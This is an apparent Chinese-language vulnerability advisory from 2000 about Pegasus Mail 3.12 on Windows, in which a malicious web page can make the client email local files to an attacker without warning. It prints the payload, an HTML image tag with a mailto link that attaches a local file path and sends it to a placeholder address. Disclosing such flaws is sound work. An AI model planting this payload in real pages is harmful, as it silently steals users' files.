发布日期：2000-10-04
更新日期：2000-10-04

受影响系统：

David Harris Pegasus Mail 3.12
   - Microsoft Windows 98
   - Microsoft Windows 95
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 2000

描述：

---

如果浏览者使用Pegasus Mail客户端，恶意的WWW站点可以复制远程系统的已知文件。

如果在HTML文档中嵌入以下代码，在用户浏览此网页时，本地文件可以在没有任何警告的情
况下自动从Pegasus Mail客户端发送到指定的email地址。

<img sr c="mailto:email@address.com -F c:\path\file.ext">

来源：<ImranG@btinternet.com>


建议：

---

尚无

浏览次数：5832
严重程度：0（网友投票）